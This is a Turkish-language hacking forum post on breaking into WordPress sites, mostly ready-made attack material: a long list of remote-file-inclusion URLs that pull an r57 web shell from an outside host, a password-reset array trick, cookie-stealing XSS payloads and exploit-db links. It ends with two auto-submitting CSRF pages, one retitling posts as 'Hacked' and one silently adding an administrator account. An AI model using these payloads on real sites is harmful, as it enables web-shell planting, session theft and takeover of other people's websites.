Saka Baslayalim. Wordpress dedin. Wordpress-de bile plugin-lerde RFI
aciklari bulunmaktda. Aciklar coktur bazi Wordpress ISS aciklarida olur.
Baslayalim RFI-den. Plugins directory-sinde bula bilirsiniz :
Kod:
/plugins/links/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/polls/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/Import.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt? /plugins/staticpages/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt? /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://creativerentacar.com/r57.txt? /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://creativerentacar.com/r57.txt? /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://creativerentacar.com/r57.txt? /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://creativerentacar.com/r57.txt? /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creativerentacar.com/r57.txt? /WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://creativerentacar.com/r57.txt?
Kod:
http://www.blogismi.com/wp-login.php?action=rp&key[]=
Kod:
if ( empty($key) )
Kod:
if (empty($key)) || is_array( $key )
Eski XSS acigi :
Kod:
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Kod:
http://target.tld/wp-admin/comment.php?action=
2.6.5 XSS (PoC)
Kod:
PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&s =% 27 [XSS] PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address =% 27 [XSS]
Kod:
http://www.exploit-db.com/exploits/18039/
)))Dizinlar boyle olur :
Ve her seyden once phpmyadmin yedekleyin onun icin bigdump.php dosyasi download link :
http://www.ozerov.de/bigdump.zip
Ve baslayalim :
 | Orjinal Boyutunda Açmak İçin ( 814x625 ve %3$sKB ) Buraya Tıklayın |
| Orjinal Boyutunda Açmak İçin ( 1025x738 ve %3$sKB ) Buraya Tıklayın |
| Orjinal Boyutunda Açmak İçin ( 1025x738 ve %3$sKB ) Buraya Tıklayın |
| Orjinal Boyutunda Açmak İçin ( 1025x738 ve %3$sKB ) Buraya Tıklayın |
iste Boylece yedeklenir. ve konumuz aciklardi :
http://www.exploit-db.com/exploits/18276/
http://www.exploit-db.com/exploits/18330/
http://1337day.com/exploits/17326
http://www.exploit-db.com/exploits/18350/
http://www.exploit-db.com/exploits/18353/(Blind SQL O.o)
http://www.exploit-db.com/exploits/18355/
Gorduyun gibi WP en guvenilir dediniz bakin gorun neleri var
)))Ve WordPress v3.3.1-de bulunan CSRF inanilmaz
bunlarla neler yapilir bu CSRF-le neler yapila bilir :
Kod:
# Admin Ekleyebilme # Admin Silebilme # Yorum onaylama, silme # Site basligini degistirebilme # Admin mailini degistirebilme ve site adresi ile oynama
Kod:
<html> <body onload="javascript:document.forms[0].submit()"> <H2>WP 3.3.1 CSRF konu degistirme Author : Hptimi</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php"> <input type="hidden" name="post_title" value="Hacked Bla bla...."/> <input type="hidden" name="post_name" value="Hacked hptimi blala...."/> <input type="hidden" name="mm" value="03"/> <input type="hidden" name="jj" value="16"/> <input type="hidden" name="aa" value="2012"/> <input type="hidden" name="hh" value=""/> <input type="hidden" name="mn" value=""/> <input type="hidden" name="ss" value=""/> <input type="hidden" name="post_author" value="1"/> <input type="hidden" name="post_password" value=""/> <input type="hidden" name="post_category%5B%5D" value="0"/> <input type="hidden" name="post_category%5B%5D" value="1"/> <input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/> <input type="hidden" name="comment_status" value="open"/> <input type="hidden" name="ping_status" value="open"/> <input type="hidden" name="_status" value="publish"/> <input type="hidden" name="post_format" value="0"/> <input type="hidden" name="_inline_edit" value="<sniffed_value>"/> <input type="hidden" name="post_view" value="list"/> <input type="hidden" name="screen" value="edit-post"/> <input type="hidden" name="action" value="inline-save"/> <input type="hidden" name="post_type" value="post"/> <input type="hidden" name="post_ID" value="1"/> <input type="hidden" name="edit_date" value="true"/> <input type="hidden" name="post_status" value="all"/> </form> </body> </html>
Bununla konu basligi deyisdirilir. Admin Ekleme :
Kod:
<html> <body onload="javascript:document.forms[0].submit()"> <H2>WP 3.3.1 CSRF Admin ekleme Author : Hptimi</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php"> <input type="hidden" name="action" value="createuser"/> <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/> <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/> <input type="hidden" name="user_login" value="hptimi"/> <input type="hidden" name="email" value="admin@hptimi.com"/> <input type="hidden" name="first_name" value="admin@hptimi.com"/> <input type="hidden" name="last_name" value=""/> <input type="hidden" name="url" value=""/> <input type="hidden" name="pass1" value="password"/> <input type="hidden" name="pass2" value="password"/> <input type="hidden" name="role" value="administrator"/> <input type="hidden" name="createuser" value="Add+New+User+"/> </form> </body> </html>
& Respect! ^_^ Peace! Topic : http://www.millikuvvetler.net/showthread.php?t=8539
Hiç yorum yok:
Yorum Gönder